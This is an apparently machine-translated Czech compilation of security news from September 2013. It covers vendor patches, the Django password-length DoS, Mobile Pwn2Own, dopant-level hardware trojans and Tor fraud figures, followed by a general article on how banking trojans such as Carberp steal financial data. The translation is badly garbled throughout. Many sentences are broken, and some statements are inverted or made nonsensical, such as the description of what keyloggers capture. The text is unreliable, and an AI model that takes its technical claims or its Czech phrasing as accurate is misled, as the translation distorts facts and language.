Kryptolog a bezpečnostní výzkumník Bruce Schneier nazval sabotáž, kterou výzkumníci ve své práci popisují, jako „nerozpoznatelnou funkčními zkouškami ani vizuální prohlídkou“. Nejhorším zneužitím této techniky je podle Schneirera úprava generátoru náhodných čísel. „Tato technika by mohla snížit množství entropie v hardwaru ze 128bitové na 32bitovou, aniž by to vestavěné testy zaznamenaly.“ Takže zatímco by uživatel předpokládal, že generátor náhodných čísel produkuje silné 128bitové šifrovací klíče, ve skutečnosti by generoval pouze snadno prolomitelné 32bitové.
Více lahůdky Apple Security košíku aktualizace!
18. září 2013. Aktualizace
APPLE-SA-2013-09-18-3 Aktualizace OS X, který řeší situace, kdy je hostname v osvědčení nejsou kontrolovány proti skutečné hostitele. Tato chyba znamená, že kdokoli s platným certifikátem může vydávat se za jinou řadu - spousta útočných aplikací v této, v kombinaci s MITM nebo DNS útočníkům
APPLE-SA-2013-09-18-2 Absolutní TON aktualizace pro IOS, který by měl být žádným překvapením, v nové verzi. Mezi hlavní výhody patří aktualizace do kořenové certifikáty, opravy kódu pro využití otázek před škodlivým PDF a videosekvence a bypass pro heslo povolený limit, což škodlivý app hrubou silou přístroj odemknout kód. Také některé zábavné opravy pro několik cross-site skriptovací vydá do Webkit (která je poskytovatelem funkcí prohlížeče v IOS)
Útoky na Patří přetečení zásobníku, chybí na hranice kontroly a některé zábavné útoky režimu jádra!
Jako vždy, dávejte pozor na podrobné údaje o bezpečnosti Page Apple Update naleznete zde ==> http://support.apple.com/kb/HT1222
Apple DDOS? Ne, jen aktualizace sestupuje!
18. září 2013. Aktualizace | OS
Množství tisku, že Jablka IOS 7 aktualizace dostali dnes má nezamýšlený důsledek - každý se zdá být tahem dolů v okamžiku, vidí, že je to k dispozici.
To je spouštění IPS senzorů a způsobuje skutečné DOS podmínky v důsledku dotčené provozu - nezamýšlené "Apple - zooka"
SWA, jeden z našich manipulátory, znamená, že to může být snadno vyřešen jeden vysílací domény tím, že Apple ukládání do mezipaměti služby na jediném Serveru OSX v síti. Klienti si jej Bonjour a jednu stahovat služby všem klientům. (Díky za screenshot SWA)
Nejsem si jistý, jak to ovlivňuje se s funkcí zjišťování služeb v mDNS - pokud má někdo informace na toto téma bychom ocenit váš pohled na pole poznámky pro tento příběh!
Obecně platí, že právě umožňuje to je dost, ale pokročilá nastavení pro ukládání do mezipaměti serveru najdete zde ==> http://support.apple.com/kb/HT5590
Cisco DCNM Aktualizace Vydáno
18. září 2013. Aktualizace
Budeme i nadále vidět webových aplikací nasazených na správu datových center funkcí. A je mi líto, ale budeme i nadále vidět bezpečnostní problémy v těchto aplikacích - některé z nich tak jednoduché, rychle proletí s Burp nebo Zap by červených označte jej.
V tomto tématu dnes Cisco příspěvků aktualizace DCNM (Cisco Prime Data Center Network Manager). Řešené otázky nejsou tak jednoduché, jak jsem popsal výše (ty jsou mnohem komplexnější než jednoduché skenování pro detekci nebo využívat), ale oni přece zahrnují vzdálené spuštění příkazu a ověření obejít - dvě věci, které většina lidí by měl mít problémy v datovém centru sítě Manažer.
Poradní je zde ==> http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm
Jako obvykle, je platný zakázka na služby nutné pro získání aktualizace. Moji klienti mají Cisco smlouvy, ale nejsem si jistý, jak nadšený jsem, že budete muset platit výživné opravit bezpečnostní otázky tak zásadní.
Apple IOS 7 - Připravte se na náraz!
18. září 2013. OS | Aktualizace
Apple IOS 7 je dnes k dispozici (právě odeslali ve skutečnosti). Zatímco hlavní tlak na to, je podpora nových platforem iPhone, můžeme očekávat, funkční a bezpečnostní změny, které mají vliv na všechny iOS platformy, mezi nimi:
na licencování app app na nastavení VPN na klíče app šifrování jediný SignOn (Co by mohlo pokazit s tím?) a lepší MDM (Mobile Device Management) Funkce - očekáváme upgrady pro Vaše firemní MDM platformy někdy opravdu brzy, a očekávají, že vedení bude chtít to aplikovat co nejdříve! Další informace o těchto funkcích zde - http://www.apple.com/ios/business/
Jsem si jistý, některé z těchto nových funkcí stojí příběh, to vše na vlastní pěst - zůstaňte naladěni!
Všichni jsme viděli na příval app aktualizací během posledních několika týdnů, kdy každý dostane jejich aplikace připraveni na nový OS. Před aktualizací, měli byste si zkontrolovat, že všechny vaše aplikace bude podporovat nový operační systém. Například, i nadále používat jako aplikaci Stanza čtenáře na můj beletrie knihovny. Vzhledem k tomu, že byl oficiálně přestěhoval do nepodporovaného stavu Amazon, myslím, že je chytrý pro mě (konečně) změnit čtenáře, než jsem aktualizovat.
Tato aktualizace je na zajímavě strávený čas na pár mých klientů. Vzhledem k tomu, jít do BYOD modelu, nyní mají tisíce i-zařízení sítě ontheir, neudržovaných a většinou ve vlastnictví jejich uživatelů (nebo jejich návštěvníků). Ibn většina organizací, těsně pod 1 GB šířka pásma režie pro tuto aktualizaci by neměl být problém, ale jeden klient v mém seznamu je v tom, že "tisíce zařízení Apple" seznamu a je také na mém "s omezenou šířkou pásma" seznamu. Vidím tato aktualizace ovlivňuje jejich obchodních aplikací, a to jak tím, že zdůrazní jejich již maximu WAN, a také tím, že přidá do své již nadměrné kapacity internetového uplinku. Měníme své QOS de-priority "Všechny věci jablko" pro dnešek. Poté můžeme charakterizovat to, co tato aktualizace vypadá na síti, uděláme ACL konkrétnější jen deprioritize aktualizace provoz. Nyní, že aktualizace je vyslán, budu roztápění tcpdump a dělat jen to!
Doporučení pro posílení kybernetické bezpečnostní politiky 18. září 2013. KyberSecurity McAfee a digitální vláda Security Forum (DGSF) vydala novou zprávu, která prozkoumá kybernetických rizik, s nimiž se potýká vládu a nabízí doporučení ke zmírnění těchto rizik.
Zpráva poskytuje obrysy dvou nástrojů, doporučenou hodnotící proces a navrhovaný rozvoj rámce, který by prkno, vedoucích pracovníků a informační týmů v organizacích, které chtějí, aby přehodnotily své strategie informační bezpečnosti a pravidla řízení. Od svého spuštění v březnu tohoto roku, DGSF Aktivně se zabývá úředníky, počítačové specialisty a poskytovatelé technologií s cílem napomoci směrování vývoje fóra a pomáhat při zajišťování kvality je práce v rámci iniciativy. Zpráva identifikuje čtyři nejdůležitější oblasti, na vládu, aby řešila, jak to pokračuje více využívat technologie ke splnění cílů úsporných a zlepšit poskytování veřejných služeb digitální: nedostatek povědomí o hrozbách informační bezpečnosti na úrovni představenstva, což organizacím nedaří poskytnout ujištění, že se plnění jejich povinností informační bezpečnosti a nákladové efektivní správu informací a kybernetické hrozby. Obavy o bezpečnost dat, blokování úsilí o posílení spolupráce, sdílení dat, BYOD a efektivnější pracovní v době, kdy vláda a veřejné služby jsou pod tlakem dodat více při nižších nákladech. Rozhraní mezi různými organizacemi jsou klíčové nebezpečných míst jako vládní hlavním cílem je spojit služeb a podpořit větší partnerské spolupráce a spolupráce napříč sektory. Stávající systémy, které nebyly určeny pro digitální věk , který podněcuje, dědictví myšlení z hlediska informační bezpečnosti, což často vede k roztříštěné a siled bezpečnostní opatření. John Thornton, tajemník digitální fóra Government Security říká: "Celkově lze říci, Velká Británie učinila obrovský pokrok ve zpracování informací a bezpečnost dat po sérii vysokých profilových porušení v posledních letech . Neexistuje však usnout na vavřínech. Organizace je třeba myslet, pokud jde o bezpečnost-by-default dodávat digitální-by-default a sdílení informací, aby bylo možné čelit kybernetickým hrozbám. Počítačová kriminalita je globální povahu a silnou veřejného a soukromého sektoru je důležité vytvořit prostředí, ve kterém organizace veřejného sektoru mohou spolupracovat k vzájemnému prospěchu. " The DGSF doporučení na radách a vedoucích zaměstnanců jsou:
Buďte si vědomi svých rizik a dát základy na místě: Identifikujte klíčové rizik, zranitelnosti a kritické informační aktiva, provádění základních kontrol a aktivně řídit informační rizika Embrace technologie: Ujistěte se, že bezpečnostní technologie infrastruktura zahrnuje komplexní počítačové hrozby, rizika a behaviorální analýzy, a robustní, odolné a automatickou ochranu před hrozbami Použijte lepší informační bezpečnosti jako prostředek: Podpora a umožňují úspory, servis vývoj a zlepšení účinnosti digitální svět nabízí po bezpečnostní bariéry byly odstraněny Rozvíjet kulturu, která zahrnuje změny: Sdílet zkušenosti a odborné znalosti napříč veřejným sektorem s cílem posílit důvěru občanů, podniků a vlády samotné do těchto digitálních systémů. Chcete-li stáhnout celou zprávu, budete muset zaregistrovat jako člen DGSF.
Kaspersky Lab uvádí na trh řešení pro multi-zabezpečení zařízení 18. září 2013. Zabezpečení Kaspersky Lab oznámila Kaspersky Internet Security - Multi-Device , nový bezpečnostní produkt, který poskytuje způsob, jak pro zákazníky zajistit jejich činnosti na internetu mezi několika zařízeními, vše prostřednictvím jediného nákupu a licence pro jednoho uživatele.
Tento software zahrnuje ochranu pro PC, Mac a Android smartphony a tablety v jeden produkt. Zákazníci si mohou nainstalovat zařízení-specifické technologie na libovolnou kombinací PC, Mac a Android smartphony a tablety, s možností pohybovat ochranu z jednoho zařízení do druhého, protože zákazníci zakoupit nová zařízení. Klíčové Android bezpečnostních prvků:
Real-time ochrana proti malwaru pro mobily, včetně automatického skenování stažených programů, aby se zabránilo instalaci aplikací rouge se tváří jako legitimní ty Prohlížení webu Ochrana zajistit zákazníkům neklikejte na škodlivé webové stránky nebo podvodné odkazy, jejichž cílem je ukrást osobní informace Anti-theft funkce, které zákazníkům umožňují najít chybějící zařízení pomocí GPS a mobilní signál. Zákazníci mohou také vzdáleně uzamknout zařízení, vymazat data, zapněte funkci alarmu a aktivaci systému fotoaparátu automaticky fotit každý, kdo v současné době má ji Zavolejte a text filtrování zpráv blokovat nevyžádané a nechtěné telefonáty. Klíčové Mac bezpečnostní prvky: Kompletní ochrana před všemi hrozbami malware, včetně specifickými pro Mac malware, a všechny PC cílení malware, které mohou být uloženy na počítačích Mac a nechtěně přeneseny do počítače Advanced Parental Controls, aby zajistily děti používat internet bezpečně a zodpovědně Na obrazovce virtuální klávesnice, poskytuje další vrstvu ochrany před malware keylogging při zadávání osobních údajů na internetu. Klíčové vlastnosti zabezpečení počítače: Lepší Bezpečné peníze proaktivní ochrana proti finanční krádeži, která zahrnuje podporu pro více webových prohlížečů, a výrazně rozšířený seznam důvěryhodných stránkách internetového bankovnictví, platebních služeb a on-line obchodů. Ochrana speciálně pro sociální sítě, jako je škodlivé adresy URL, která se rozšířila na Facebooku a Twitteru Další ochranu před nejnovějšími hrozbami prostřednictvím vylepšené automatické technologie Exploit Prevention, která zajišťuje zranitelnosti v rámci programů nepovede k PC kompromitaci Nové nástroje porazit malware, který uzamkne počítač a požaduje výkupné vrátit kontrolu vlastníka dat Rodičovská kontrola blokovat nežádoucí obsah, omezit množství času stráveného online a automaticky zabránit dětem sdílení soukromých informací o kreditní kartě čísla, telefonní čísla, domovní adresy - na sociálních sítích. Christopher Christiansen, viceprezident IDC bezpečnostních produktů a služeb komentáře: "Jako domácí spotřebiče množit s mobilními zařízeními spojující počítače, tam jsou dva problémy. Za prvé, je rychle se rozvíjející mobilní hrozeb. Za druhé, je řízení problém udržet všechny chráněné zařízení a zároveň se zjednoduší instalace, aktualizace a licencí. Nicméně, složitost řízení více bezpečnostních produktů pro PC oproti smartphony a tablety způsobí, že lidé nedělají nic. To klade je v ohrožení a umožňuje správu multi-zařízení domácnosti opakující se noční můra. Řešením je přijetí jednotné řešení, které zajišťuje většinu nebo všechny domácnosti, v zařízení. Řešení, jako Kaspersky Internet Security - Multi-Device jsou pokrokový krok od společnosti Kaspersky Lab o tom, jak zjednodušit proces chránící domácnost zařízení ".
Self-healing zabezpečení systému BIOS od HP 18. září 2013. Zabezpečení | Hardware Společnost HP oznámila, HP biosféry s SureStart techniky, sebeléčení řešení zabezpečení vytvořen s cílem pomoci organizacím lépe spravovat rizika a chránit uživatele a produktivitu IT. HP biosféry s SureStart technologie byla vyvinuta s HP Labs, společnost je centrální výzkumná rameno a může automaticky obnovit Systém BIOS počítače již dříve bezpečného stavu v případě napadení nebo je poškozen. Toto bezešvé schopnost přináší "budoucnost," technologický průlom k HP EliteBook zákazníky tím, že konečný PC BIOS obranu. Společnost HP přidala HP SureStart řešení jeho vícevrstvého HP Client Security portfolia řešení s cílem poskytnout zákazníkům ještě silnější bezpečnostní protokol, který brání proti neoprávněný přístup k systému. IT se neustále za úkol chránit důvěrné informace, včetně zaměstnanců identit a údaje o zákaznících napříč různými zařízeními. To je třeba opravit celou řadu lidí s různými pracovními styly celé organizace dělá neočekávané podnikové IT bezpečnostních hrozeb trvalou výzvu. "bezpečnostní situace se stala složitější, neboť hrozby stále rafinovanější a zaměstnanců vyžadují flexibilitu zařízení se shoduje s jejich měnící se pracovní prostředí , "řekl Lorri Jefferson, ředitel, tablety a Software Strategie společnosti HP. "Tato nabídka průlom zabezpečení jsou jednoduché, bezešvé řešení, které by řešily tyto sbíhající se trendy přináší podnikovým zákazníkům Ultimate Fighting mechanismus pro zmírnění rizika, hrozby a negativní obchodní výsledky." biosféra HP s technologií SureStart je prvním řešením svého druhu, aby prakticky bez přerušení produktivita pro podnikové uživatele tím, že zabrání korupci a poskytování samoléčbu před malwarem nebo nepravděpodobný neúspěšných aktualizací systému BIOS počítače. Bez ohledu na důvod, úmyslné nebezpečný útok, neznámé příčiny, nepodařilo aktualizace nebo jiné náhodné příčiny HP SureStart obnoví PC BIOS pro další uživatele produktivity a snížení IT help desk požadavky. S HP SureStart zákazníci již nebudou muset starat o bezpečnost jejich PC Aktualizace systému BIOS. Bezpečnost a spolehlivost vylepšení jsou dodávány přímo zákazníkovi, přes web nebo zákazníka interní webové stránky. Tento out-of-the-box řešení je založeno na biosféře HP, HP špičkové firmware ekosystému, který zahrnuje HP BIOS a zabezpečený integrovaný řadič. Biosféra HP umožňuje jak HP Client Security a klienta obûti řešení pro řízení tím, že automatizuje ochranu dat, stejně jako robustní konfigurovatelnost a možnosti správy pro obchodní počítačů HP. HP SureStart technologie poskytuje maximální ochranu před útoky škodlivého softwaru z PC BIOS, prevenci uživatele prostoje a IT podpora požadavků. V kombinaci s HP BIOS Protection, (2) roztok zjistí, zabraňuje, zprávy a umožňuje automatické obnovení pokročilých perzistentních hrozeb (Apts). To udržuje vládní a obchodní profesionály v bezpečí před cybercrimes zvyšující produktivitu a zároveň získat klid.
Firefox 24 poskytuje 17 bezpečnostních aktualizací 18. září 2013. Aktualizace Mozilla vydala Firefox 24 , který obsahuje 17 bezpečnostních aktualizací: sedm jsou kritické, čtyři vysoká a šest středně.
Opraven v této verzi: MFSA 2013-92 GC nebezpečí s výchozími oddíly a rám řetězce restaurování MFSA 2013-91 Uživatelem definované vlastnosti na proxy DOM dostat špatné "tento" objekt MFSA 2013-90 Paměť korupci rolování MFSA 2013-89 přetečení vyrovnávací paměti s multi-sloupci, seznamy, a plave MFSA 2013-88 prostor nesoulad znovu spojená XBL aktivy uzly MFSA 2013-87 Sdílená knihovna objektů zatížení od zapisovatelné umístění MFSA 2013-86 WebGL Prozrazení informací prostřednictvím OS X ovladače NVIDIA grafické MFSA 2013-85 Neinicializované údaje IonMonkey MFSA 2013-84 stejného původu bypass přes symbolické odkazy MFSA 2013-83 Mozilla Updater nezamyká MAR soubor po ověření podpisu MFSA 2013-82 Volání prostor pro nové objekty Javascript může vést k poškození paměti MFSA 2013-81 Use-po-free s prvku select MFSA 2013-80 NativeKey pokračuje zpracování zprávy po hlavní widget je zničena MFSA 2013-79 Use-po-zdarma animace Správci během klonování stylů MFSA 2013-78 Integer přetečení ÚHLU knihovně MFSA 2013-77 Nesprávné stát v Tree Builder HTML5 se šablonami MFSA 2013-76 Různé nebezpečí paměti bezpečnost (rv: 24,0 / rv: 17.0.9)
Společnost Microsoft vydává Out-of-band poradenství pro všechny verze aplikace Internet Explorer
17. září 2013. Zranitelnosti
Microsoft právě vydal poradní na výsledek zranitelnost Internet Explorer , který by umožnil vzdálené spouštění. Zpráva odkazuje veřejná dostupnost informací o jeho zranitelnosti. Dlouhý příběh krátký, cílený útok, který se uživatele k návštěvě škodlivého webové stránky (nebo škodlivý obsah na jinak bezpečné webové stránky) by mohlo vést k poškození paměti, které může spustit libovolný kód s oprávněními přihlášeného uživatele. Dvě navrhovaná opatření jsou poskytovány společností Microsoft, platí fixit poskytované společností Microsoft ani používat Emet 3.0/4.0 , která poskytuje všeobecný ochranu paměti (a pravděpodobně není špatný nápad nasadit stejně). Všimněte si, že fixit platí pouze pro 32bitové verze aplikace Internet Explorer.
Tento příspěvek bude aktualizován s více detaily, jak se situace odůvodňuje.
30 procent z transakcí uskutečněných od Tor jsou podvodné 17. září 2013. Zabezpečení | Šifrování | KyberSecurity iovation oznámil, že 30,2 procent operací prováděných od Tor (cibule směrovač) v srpnu bylo podvodné. To je ve srovnání s celkovým podvod mírou 1 procento pro všechny on-line transakcí v srpnu. Tor je soukromí protokol, který je určen na pomoc lidem, pro prohlížení internetu anonymně. Činí tak tím, že přesměruje webový provoz po hard-to-následovat cesty a přiřazení uživatelů webových náhodné IP adresy, která může kdykoliv změnit. To pomáhá maskovat skutečné uživatelů geolocations a IP adresy jejich zařízení připojených k Internetu. Podle Tor metriky, více než 1,5 milionu lidí používá Tor každý den od začátku září 2013 se z 500 tisíc denně na začátku srpna 2013. " Počítačoví zločinci jsou vždy hledají způsoby, jak létají pod radarem, "řekl Scott Waddell, technologický ředitel společnosti iovation. "Zatímco Tor na jeho povrchu se zdá být pro větší dobro, je nepřiměřeně používá k podvodným a zneužívající transakcí. Za zmínku stojí, Tor použít více než zdvojnásobil v srpnu, pravděpodobně kvůli masivnímu botnetu pákového Tor pro velení a řízení komunikace. " podvodu nálezy byly vyrobeny iovation analýzou 240000000 transakcí uskutečněných v srpnu 2013 pocházejí z 1,5 miliardy zařízení, jež má ve svém zařízení pověst databáze. Transakce s využitím Tor byly identifikovány iovation využitím technologie je vyvinuta korelovat transakce na IP adresy, které jsou součástí Tor.
Příliš dlouhá hesla může DoS některé servery 17. září 2013. Zranitelnosti | Zabezpečení Objev zranitelnosti v populárním open source aplikací web rámcové Django nedávno prokázala, že použití dlouhého hesla není vždy to nejlepší, co má dělat.
Jak vysvětlil Web Developer James Bennett, Django používá PBKDF2 algoritmus hash uživatelských hesel, takže je velmi obtížné pro brute-force útoky, které mají být úspěšně proveden. "Bohužel, tato složitost být také použit jako útoku. Django neukládá než maximální na délce hesla holého textu, což znamená, že útočník může jednoduše podat libovolně velký - a zaručený k selhání - hesla, nutit server se systémem Django provést výsledný hash drahé výpočtu ve snaze kontrolovat heslo . Heslo jeden megabajt ve velikosti, například, bude vyžadovat zhruba jednu minutu výpočtu pro kontrolu při použití PBKDF2 hasher, "Bennet vysvětlil v blogu. "To umožňuje denial-of-service útoků přes opakované podání velkých hesel , vázání serverové zdroje na drahé výpočtu příslušných hash. " Existence vady byla zveřejněna na veřejné django-developers mailing listu, a opustil základní tým usilovně snaží opravit co nejdříve je to možné. Naštěstí to trvalo jen jeden den, a oni to udělali tím, že omezí hesla 4096 bajtů. Nově vydána Django 1.4.8, Django 1.5.4 a Django 1.6 beta 4 obsahuje opravu a všichni uživatelé se doporučuje provést upgrade na jednu z tyto verze ihned. Bennett také nezapomeňte se zeptat, že všechny budoucí potenciální bezpečnostní problémy vždy sdělují prostřednictvím e-mailu na security@djangoproject.com, spíše než prostřednictvím veřejných kanálů.
Mobilní Pwn2Own: $ 300k prize pool čeká úspěšné soutěžící 17. září 2013. Hacking Další Mobile Pwn2own soutěž se bude konat v listopadu v bezpečnosti PacSec aplikované konferenci v Tokiu a soutěžící mohou vydělat až $ 100,000 úspěšné zneužití, HP ZDI manažer Brian Gorenc oznámila. Uvedená cena bude dána ven první, která ohrožuje baseband procesor některý z mobilních zařízení jsou k dispozici pro výběr, a menší věcné ceny půjdou k těm, které ohrožují:
Bluetooth, Wi-Fi, USB nebo NFC přes bezdrátové nebo kabelové útok ($ 50,000) Mobile Web Browser (40.000 dolar + 10,000 dolarů od Google, pokud je prohlížeč Chrome na Android, a to buď na Google Nexus 4 nebo Samsung Galaxy S4) Mobilní aplikace / operační systém (40.000 dolar) Zprávy služby - SMS, MMS, nebo CMAS (70.000 dolar) K dispozici bude jen jeden vítěz ve všech kategoriích s výjimkou mobilního webového prohlížeče jedno, kde Google se rozhodl nabídnout $ 10K pro všechny soutěžící, kteří úspěšně cíl Chrome na Android. "Buďte první, kdo ohrozit vybrané cíle v jedné z kategorií použití dříve neznámá zranitelnost (která nebyla zveřejněna na postižené dodavatele). Máte 30 minut na dokončení své pokusy. Když jste úspěšně předvedli své exploit a "pwned" cílové zařízení, budete muset poskytnout ZDI se plně funkční exploit a podrobnou zprávu popisující všechny chyby zabezpečení a technik používaných v útoku, "Gorenc vysvětlil . "Úspěšný útok proti těmto zařízením musí vyžadovat malou nebo žádnou interakci s uživatelem a počáteční chyba použitý v útoku musí být v evidenčním kategorii . Soutěžící musí prokázat vzdálené spuštění kódu vynecháním karantény (v případě potřeby) a exfiltrating citlivé informace, tiše volání na dlouhé vzdálenosti, nebo čísla, odposlouchávání hovorů. Aby nedošlo k rušení licencovaných dopravců sítí, musí být všechny RF útoky uskutečnit ve stanovené RF izolace skříně. Chyby používané v útoku musí být nepublikovaný 0-dní. " Více informací o soutěži a její pravidla mohou být pročtený zde .
Vědci vytvořit nezjistitelné layout úrovni hardwaru trojské koně 17. září 2013. Viry | Hardware Skutečnost, že většina počítačového hardwaru je produkována mimo USA a Evropě je již dlouho představila starost vlád těchto zemí, a pro podniky a korporace se sídlem v nich. jsou především obavy o bezpečnost integrovaných obvodů používaných ve vojenských zařízeních, průmyslové řídicí systémy, zdravotnické a jiné důležité zařízení, a jsou si vědomi, že možnost hardwarových trojské koně jsou integrovány v nich během výrobního procesu není vůbec přehnané. Skupina výzkumníků z několika univerzit v USA, Švýcarsku, Nizozemí a Německo se nedávno zveřejnila dokument zabývající se právě této možnosti, a navrhly za "velmi nenápadný přístup k realizaci hardwaru trojské koně pod úrovni hradel". "Často okruh bloky v jednom IC jsou navrženy různými stranami, vyrábí externí a případně off-shore slévárna, baleny samostatné společnosti a dodává nezávislý distributor. Toto zvýšené využívání out-sourcing a agresivním používání globalizace ve výrobě okruhu dala vzniknout několika otázky důvěry a bezpečnosti, neboť každý ze zúčastněných stran potenciálně představuje bezpečnostní riziko, "poukázali, a dodal, že hrozba hardwaru trojské koně se očekává pouze s časem zvyšovat, a to zejména s nedávným obavám kybernetická válka. Jejich Není to první výzkum do vytvoření hardwarové Trojan, ale je mezi prvními ty, které místo přidání další obvody pro konstrukci IC je již soustředěna na změnu příměsí polaritu několik jeho tranzistorů. "doping" tranzistor se provádí zavedením nečistot do své struktury za účelem změny jeho elektrické vlastnosti. Předchozí výzkumy se podařilo, aby se jim nepodaří před tím, než by měl mít, ale tato skupina se podařilo, že ochrana poskytovaná Intel generátor náhodných čísel (RNG), slabší, než bylo zamýšleno, a vytvářet skryté boční kanál do implementace AES sbox v aby unikat tajné klíče. Ale nejdůležitější ze všeho je, jejich modifikace zmást řadu společných metod Trojan testování, které je součástí optical inspekce a kontroly proti "čipy zlatých" (tj. konečné, ověřené příkladem toho, jak by měl vypadat, že čip a být) . "Pro našeho nejlepšího vědomí, naše dopant bázi trojské koně jsou nejprve navrhoval, provedeno, testovány a hodnoceny layout-level hardware trojské koně, které mohou dělat více, než působí jako denial-of-service trojských koní založených na účinkům stárnutí", které uzavřena.
Schopnost provádět finanční transakce na internetu učinil naše životy mnohem jednodušší.Nyní prakticky každý druh výrobku či služby lze zakoupit z domova, zatímco webové služby bankovní ušetří námahu stojí v břehové čáry.Nicméně, rostoucí popularita on-line plateb, hraje do rukou zločinců, kteří jsou také plné ruce práce se přijímají špičkové technologie: čím více lidí se rozhodnou pro vzdálenou finančního řízení, tím více potenciálně stát obětí.Trestná činnost se stává výhodnějším.Jako výsledek, krást finanční informace a převodem aktiv uživatelů na účty pod kontrolou zločinci je nyní velmi efektivní způsob, jak vydělat peníze, zaměstnaná zločinci po celém světě.
Teoreticky pro zločinci, kteří se snaží ukrást finanční informace, je výhodnější zaútočit na straně serveru zpracování plateb (včetně infrastruktury bankovnictví, platebních systémů, serverů apod.), neboť obsahuje obrovské množství dat, které mohou být použity pro Výhodou nebo prodat.Nicméně, v praxi je stejně obtížné získat takový přístup, aby narazit do fyzického bankovním sejfu, protože firemní servery jako velmi dobře chráněna.Proto zločinci raději útočit na uživatele bankovnictví a platebních systémů - ty nejsou tak dobře chráněny.V jediném útoku, může zločinci nakazit desítky tisíc domácích počítačů, a ve velkém měřítku jim přinese kýžený zisk.
Jak uživatelská data krádeži
Zločinci jsou vyzbrojeni celý arzenál metod, s nimiž získat přístup k důvěrným informacím uživatelů.Většina útoků, které se zaměřují na finanční údaje mají sociální inženýrství jako jejich základní prvek.To lze použít k šíření malware nebo ukrást přihlašovací údaje přímo.
Phishing je klasickým příkladem využití sociálního inženýrství s cílem podvést uživatele o jejich finančních informací.Uživatel je svedena předávání důvěrných informací zločinci.Například může být dezorientovaný oběť obdrží "oficiální" písmeno v názvu renomované banky (platební systém, internetový obchod, atd.), které říká, že tam byla porucha na serveru organizace, takže všichni klienti potřebují urychleně poskytnout jejich osobní údaje pro ověření.Záminky se může lišit, ale v každém případě je klient vyzván, aby zaslaly své přihlašovací údaje v odpovědi e-mailem, zadejte je v přiloženém webového formuláře, nebo na banky "oficiální" webové stránky, v návaznosti na odkaz v e-mailu.Veškeré informace poskytnuté uživatelem dorazí v rukou kybernetických zločinců.
Podvodníci používají falešné webové stránky, které napodobují originály.
Příklad phishing webu
Chcete-li spoofing méně nápadné, že počítačoví zločinci používají URL adresy, které jsou podobné těm z původních webových stránek.Různé způsoby falšování lince v adresním řádku jsou také používány.
Výmysly Podvodníci jsou často těžké odlišit od původních stránek.Proto odborníci radí uživatelům přístup k finančním stránky ze záložek ve svém prohlížeči, spíše než po e-mailový odkaz.
Existují také specializované škodlivé programy určené k ukrást finanční informace, jedná se o bankovní trojské koně.Obvykle se automaticky shromažďují informace o platbách provedených z infikovaných počítačů a občas provádět finanční transakce ve jménu uživatele.
Když klienti bank jsou napadeny pomocí škodlivých programů, phishing e-maily mohou být zaslány ve jménu napadeného banky.V těchto falešných e-mailů jsou uživatelé požádáni, aby zaslali informace, ale otevřít přiložený dokument pod nějakou záminkou.Příloha, ve skutečnosti je škodlivý soubor.
Tato masivní rozšíření bankovních trojských koní je podporovaný využije zranitelnosti ve Windows a dalších populárních softwarových aplikací.Bez toho, aby uživatel vědět, že tyto exploity proniknout do systému pomocí softwarových chyb a stahovat další škodlivé programy, které kradou informace o financích z počítače oběti.Chcete-li útok efektivní, že zločinci využít tzv. exploit balení, nebo balení, které využije na různé zranitelnosti, spíše než jednotlivé využije.Exploit balení analyzuje software nainstalovaný na počítači uživatele, pokud zjistí mezery v software, ale vybere si vhodnou exploit infikovat počítač.
Exploit balení jsou umístěny buď na serverech Počítačoví zločinci "nebo pirát zdrojů.Odkazy na činů jsou distribuovány zločinci přes spam, sociálních sítí, hostované na napadených legitimní stránky, dokonce i transparenty a Hádanky právních reklamních systémů mohou být použity pro toto.Využije zase stáhnout trojské koně obětí počítačů.Infekce oblíbených míst jsou obzvláště nebezpečné: jsou navštívilo mnoho uživatelů, a když škodlivý odkaz je k dispozici, je pro každého návštěvníka je počítač nenápadně napaden exploity, které se snaží připojit škodlivé programy k nim.
Zločinci používají oba víceúčelových bankovní trojské koně, schopné napadat klienty různých bank nebo platební systémy a jednoúčelové trojské koně určené k útoku na zákazníky konkrétních bank.
Jak trojské koně pracují
Jakmile se na počítači uživatele, bankovní trojské koně vytváří oporu v systému, a pak začne jeho zadaný úkol, který je ukrást všechny typy finančních informací od uživatele.
Škodlivé programy používají následující postupy:
Keylogging.Intercept trojské koně úhozů, když uživatel zadá informace, které nejsou předmětem zájmu zločinci, jako jsou přihlašovací údaje.
Snímání screenshotů zachytit důvěrné finanční informace zadané pomocí běžné klávesnice.V tomto případě se zločinci pouze poznat informace zobrazené během typu dovnitř, ale nemůže získat přístup uživatele přihlašovací jméno a heslo, protože zadané znaky jsou nahrazeny hvězdičkami na obrazovce.
Obcházení virtuální klávesnice: zachycením obrazu obrazovky plochy kolem kurzoru v době, kdy uživatel klepne levým tlačítkem myši.Tímto způsobem cybercriminal zachycuje znaky, které uživatel zadá pomocí virtuální klávesnice, a tak ví uživatele přihlašovací jméno a heslo.
Úprava souboru hosts.Informace uložené v tomto souboru má přednost před informacemi, které webový prohlížeč obdrží z DNS-server.Trojské koně přidat bankovní URL k tomuto souboru a přiřadit IP-adresy serverů počítačoví zločinci "k nim.V důsledku toho jsou uživatelé, kteří zadejte tyto adresy URL banky do svých prohlížečů přijata podvodné stránky, i když stále vidět právní bankovní URL ve svém prohlížeči.Pokud uživatel zadá své přihlašovací údaje na falešné stránky, je tato informace zaslána zločinci.
Vniknutí do běžícího procesu prohlížeče.Díky tomu, může Trojan ovládání prohlížeče připojení k serveru.Tímto způsobem mohou zločinci získat přihlašovací údaje, které uživatelé vstupují na bankovní stránkách, stejně jako upravit webovou stránku v obsahu (přes webové injekce), čímž se získá další důvěrné informace.
Pro compelte drtivou většinu on-line finančních operací, uživatelé potřebují webových prohlížečů.Techniky používané v moderních bankovních trojských koní jsou tak či onak souvisí s tímto softwarem.
Webové injekce nebo modifikující obsah HTML stránky, jsou populární metoda s zločinci.Škodlivý program přidá další pole, když jsou banky webové stránky zobrazené v prohlížeči, vyzve uživatele k zadání důvěrných informací.Například Trojan Carberp používá webové injekci přidat další pole na stránce online bankovnictví položka, ve které vyzve uživatele k zadání jeho / její číslo platební karty, jméno držitele, datum platnosti, CVV, CVC a kód slovo.Pokud uživatel odmítne učinit, Trojan zobrazí chybovou zprávu a blokuje bankovní relace.
Žádosti informace Carberp o pozměněném hlavní stránce on-line bankovního systému (viz červených krabic)
